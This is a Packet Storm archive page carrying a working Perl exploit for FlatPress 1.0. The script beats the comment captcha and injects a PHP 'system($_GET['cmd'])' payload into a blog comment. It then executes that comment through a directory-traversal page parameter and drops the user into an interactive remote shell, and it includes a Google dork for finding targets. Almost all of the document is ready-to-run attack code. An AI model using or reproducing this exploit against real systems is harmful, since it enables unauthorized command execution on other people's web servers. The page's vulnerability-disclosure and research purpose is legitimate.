what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flatpress 1.0 Traversal / Command Execution

Flatpress 1.0 Traversal / Command Execution
Posted Nov 6, 2013
Authored by Wireghoul

Flatpress version 1.0 remote code execution exploit that leverages a comment loaded through a directory traversal vulnerability.

tags | exploit, remote, code execution
SHA-256 | 8cbb0d3675b2bd21358cd41f0015f77833c3b74c965121dd98e9e879bf4160dc

Flatpress 1.0 Traversal / Command Execution

Change Mirror Download
#!/usr/bin/perl
# Exploit Title: Flatpress remore code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link:
http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods:
Nosebleed section

use strict;
use warnings;
use LWP::UserAgent;

&banner;
&usage if (!$ARGV[0]);
my $injid = 'Spl0ited'.int(rand(9999));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });

sub banner {
print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
print "=======================[ justanotherhacker.com]==\n";
}

sub usage {
print "Usage: $0 <url>\n";
exit;
}

my $response =
$ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
print "[-] Inline PHP plugin not found at
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
if ($response->decoded_content =~
/(http.*?x=entry:entry.*?;comments:1#comments)/) {
my $cmntlink = $1;
print "[+] Found comment link: $cmntlink\n";
my $aaspam = 0; # Can't be bothered solving easy captchas, just
reload page until we get one we like
while ($aaspam == 0) {
$response = $ua->get($cmntlink);
if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
\(\*\)/) {
$aaspam = $1+$2;
print "[+] Defeated antispam $1 + $2 = $aaspam\n";
} else {
$response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
print "[*] Unknown antispam: $1 ... retrying\n";
}
}
# Post a comment
$response = $ua->post(
$cmntlink."form",
Content => {
'name' => $injid,
'email' => '',
'url' => '',
'aaspam' => $aaspam,
'content' =>
"SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
'submit' => 'Add',
}
);
$response = $ua->get($cmntlink);
# Find link to injected content, then execute psuedo shell in loop
my @cmnts = split (/<li id="comment/, $response->decoded_content);
my @injected = grep /$injid/, @cmnts;
if ($injected[0] =~ /$injid/) {
print "[+] Injection ($injid) successful\n";
$injected[0] =~
m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
my
$shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
print "[*] Dropping into shell, type exit to exit\n";
my $line='';
while (1) {
print '$';
$line=<STDIN>;
if ($line =~ /^exit$/) { exit; };
my $output=$ua->get("$shell&cmd=$line");
$output->decoded_content =~ /SHELL(.*)LLEHS/ms;
my $clean = $1; $clean =~ s/<br \/>//g;
print "$clean\n";
}
} else {
print '[-] Unable to identify the injection point';
}
} else {
print "[-] Comment link not found\n";
}
} else {
die $response->status_line;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close